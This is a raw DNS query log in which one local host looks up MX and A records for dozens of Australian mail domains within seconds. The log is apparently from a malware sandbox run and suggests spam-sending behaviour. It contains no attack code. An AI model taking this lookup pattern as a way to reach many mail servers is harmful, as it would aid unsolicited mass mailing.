                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.413728952 CET8.8.8.8192.168.2.30x8e22No error (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.471086025 CET8.8.8.8192.168.2.30xb8ceNo error (0)aspmx4.googlemail.com142.251.8.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.490415096 CET8.8.8.8192.168.2.30xd19cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.490415096 CET8.8.8.8192.168.2.30xd19cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.490415096 CET8.8.8.8192.168.2.30xd19cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.510760069 CET8.8.8.8192.168.2.30x92eaNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.569192886 CET8.8.8.8192.168.2.30x1e69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.569192886 CET8.8.8.8192.168.2.30x1e69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.569192886 CET8.8.8.8192.168.2.30x1e69No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.594964981 CET8.8.8.8192.168.2.30x5882No error (0)dcsi.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.599010944 CET8.8.8.8192.168.2.30x5759No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.654078960 CET8.8.8.8192.168.2.30xe51dNo error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.681397915 CET8.8.8.8192.168.2.30x338eNo error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.681397915 CET8.8.8.8192.168.2.30x338eNo error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.741209984 CET8.8.8.8192.168.2.30x23eNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.741209984 CET8.8.8.8192.168.2.30x23eNo error (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.761866093 CET8.8.8.8192.168.2.30xd75fNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.835638046 CET8.8.8.8192.168.2.30x803aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.835638046 CET8.8.8.8192.168.2.30x803aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.835638046 CET8.8.8.8192.168.2.30x803aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.859967947 CET8.8.8.8192.168.2.30xad92No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.913710117 CET8.8.8.8192.168.2.30x29f9No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.943398952 CET8.8.8.8192.168.2.30xf26cNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.001372099 CET8.8.8.8192.168.2.30xfdaNo error (0)mail.dcsi.net.au203.30.68.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.090128899 CET8.8.8.8192.168.2.30x2d95No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.090128899 CET8.8.8.8192.168.2.30x2d95No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.090128899 CET8.8.8.8192.168.2.30x2d95No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.120047092 CET8.8.8.8192.168.2.30x4456No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.179939032 CET8.8.8.8192.168.2.30x975cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.179939032 CET8.8.8.8192.168.2.30x975cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.179939032 CET8.8.8.8192.168.2.30x975cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.199187040 CET8.8.8.8192.168.2.30x341dNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.223822117 CET8.8.8.8192.168.2.30x702cNo error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.295281887 CET8.8.8.8192.168.2.30x9beeName error (3)surtek.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.383172989 CET8.8.8.8192.168.2.30x45d0No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.383172989 CET8.8.8.8192.168.2.30x45d0No error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.414482117 CET8.8.8.8192.168.2.30xbd68No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.414482117 CET8.8.8.8192.168.2.30xbd68No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.433211088 CET8.8.8.8192.168.2.30xeb64No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.442281008 CET8.8.8.8192.168.2.30xae93No error (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.442281008 CET8.8.8.8192.168.2.30xae93No error (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.442281008 CET8.8.8.8192.168.2.30xae93No error (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.442281008 CET8.8.8.8192.168.2.30xae93No error (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.442281008 CET8.8.8.8192.168.2.30xae93No error (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.482414007 CET8.8.8.8192.168.2.30xc64No error (0)ALT4.ASPMX.L.GOOGLE.COM173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.485404968 CET8.8.8.8192.168.2.30x8129No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.509747982 CET8.8.8.8192.168.2.30xf961No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.509747982 CET8.8.8.8192.168.2.30xf961No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.567349911 CET8.8.8.8192.168.2.30x80d0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.567349911 CET8.8.8.8192.168.2.30x80d0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.567349911 CET8.8.8.8192.168.2.30x80d0No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.587469101 CET8.8.8.8192.168.2.30x5aeaNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.693593979 CET8.8.8.8192.168.2.30x22adNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.714306116 CET8.8.8.8192.168.2.30x56cbNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.805567026 CET8.8.8.8192.168.2.30xaf1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.805567026 CET8.8.8.8192.168.2.30xaf1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.805567026 CET8.8.8.8192.168.2.30xaf1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.823771954 CET8.8.8.8192.168.2.30x2c31No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.102684021 CET8.8.8.8192.168.2.30xbdaaNo error (0)nac.nsw.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.151096106 CET8.8.8.8192.168.2.30x8908No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.151096106 CET8.8.8.8192.168.2.30x8908No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.151096106 CET8.8.8.8192.168.2.30x8908No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.176666975 CET8.8.8.8192.168.2.30x118No error (0)nac-nsw-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.176666975 CET8.8.8.8192.168.2.30x118No error (0)nac-nsw-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.225229025 CET8.8.8.8192.168.2.30xc90bNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.247675896 CET8.8.8.8192.168.2.30xdcf8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.247675896 CET8.8.8.8192.168.2.30xdcf8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.247675896 CET8.8.8.8192.168.2.30xdcf8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.283333063 CET8.8.8.8192.168.2.30x2ae4No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.383168936 CET8.8.8.8192.168.2.30x5249No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.383168936 CET8.8.8.8192.168.2.30x5249No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.383168936 CET8.8.8.8192.168.2.30x5249No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.444487095 CET8.8.8.8192.168.2.30xa562No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.470206976 CET8.8.8.8192.168.2.30x8eafNo error (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.666829109 CET8.8.8.8192.168.2.30x46b1Name error (3)edu.nsw.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.727369070 CET8.8.8.8192.168.2.30x7e55No error (0)mail.austarnet.com.au143.95.39.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.903140068 CET8.8.8.8192.168.2.30x113cServer failure (2)vsapinconsulting.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.957953930 CET8.8.8.8192.168.2.30xd6b9No error (0)hockingstuart.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.023621082 CET8.8.8.8192.168.2.30xb173No error (0)hockingstuart-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.023621082 CET8.8.8.8192.168.2.30xb173No error (0)hockingstuart-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.039881945 CET8.8.8.8192.168.2.30xbb2dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.039881945 CET8.8.8.8192.168.2.30xbb2dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.039881945 CET8.8.8.8192.168.2.30xbb2dNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.106281042 CET8.8.8.8192.168.2.30xa5f8No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
